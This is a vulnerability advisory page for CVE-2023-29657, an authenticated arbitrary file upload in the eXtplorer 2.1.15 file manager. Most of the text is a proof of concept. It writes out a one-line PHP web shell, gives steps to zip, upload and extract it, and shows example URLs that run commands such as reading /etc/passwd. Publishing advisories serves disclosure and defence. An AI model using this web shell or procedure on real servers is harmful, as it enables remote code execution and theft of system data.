Headline

CVE-2023-29657: eXtplorer 2.1.15 – Arbitrary File Upload – Tristão Marinho

eXtplorer 2.1.15 is vulnerable to Insecure Permissions. File upload in file manager allows uploading zip file containing php pages with arbitrary code executions.

1 year ago

CVE

Open in Source

#linux #cisco #php #auth

**# Title: eXtplorer 2.1.15 – Arbitrary File Upload Remote following Code Execution (Authenticated)
**

Date: 2022-11-09
Author: Francisco Marinho
Vendor Homepage: http://extplorer.net/
Software Link: http://extplorer.net/attachments/download/99/eXtplorer_2.1.15.zip
Version: 2.1.15
Tested on: Linux

==========> POC <==========

1- Login with your account
2- Access the directory /index.php
3- Create a home.php file containing <?php system($_GET[‘tristao’]); ?>
4- zip the file for home.zip
5- Upload zip file for application
6- Right click on the zip file home.zip and click extract file
7- Go to http://exemple.com/home.php?tristao=id

Examples:
cat /etc/passwd
/index.php?tristao=cat%20%20/etc/passwd
cat ls -la
/index.php?tristao=ls%20-la

Procedure

http://tristaomarinho.com/home.php?tristao=id

http://tristaomarinho.com/home.php?tristao=ls%20-la

http://tristaomarinho.com/home.php?tristao=cat%20%20/etc/passwd